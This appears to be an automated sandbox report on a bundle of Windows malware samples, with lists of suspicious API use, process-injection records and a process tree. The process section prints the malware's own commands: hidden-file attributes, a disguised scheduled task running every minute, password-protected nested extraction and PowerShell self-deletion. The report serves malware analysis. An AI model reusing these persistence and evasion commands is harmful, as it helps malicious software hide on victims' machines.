Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
N/A N/A C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
N/A N/A C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\original.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Identification-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\onetap.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\wow.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\yiklfON.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe N/A
N/A N/A C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
N/A N/A C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\seksiak.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\seksiak.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pp.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\twztl.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pornhub_downloader.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1487223240.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4288 wrote to memory of 2536 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\surfex.exe
PID 4288 wrote to memory of 2536 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\surfex.exe
PID 4288 wrote to memory of 2536 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\surfex.exe
PID 2536 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2536 wrote to memory of 1772 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4504 wrote to memory of 1540 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
PID 4504 wrote to memory of 1540 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
PID 4504 wrote to memory of 1540 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
PID 4504 wrote to memory of 4664 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
PID 4504 wrote to memory of 4664 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
PID 1540 wrote to memory of 2856 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe C:\Windows\system32\cmd.exe
PID 1540 wrote to memory of 2856 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe C:\Windows\system32\cmd.exe
PID 2856 wrote to memory of 1120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2856 wrote to memory of 1120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2856 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 1828 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2856 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2856 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2856 wrote to memory of 4304 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 2856 wrote to memory of 4304 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 4304 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 4304 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4304 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4304 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1696 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 1696 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4060 wrote to memory of 1120 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4264 wrote to memory of 4224 N/A C:\Users\Admin\Desktop\Files\surfex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"

C:\Users\Admin\Desktop\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463.exe"

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\Files\Identification-1.exe

"C:\Users\Admin\Desktop\Files\Identification-1.exe"

C:\Users\Admin\Desktop\Files\87f3f2.exe

"C:\Users\Admin\Desktop\Files\87f3f2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"

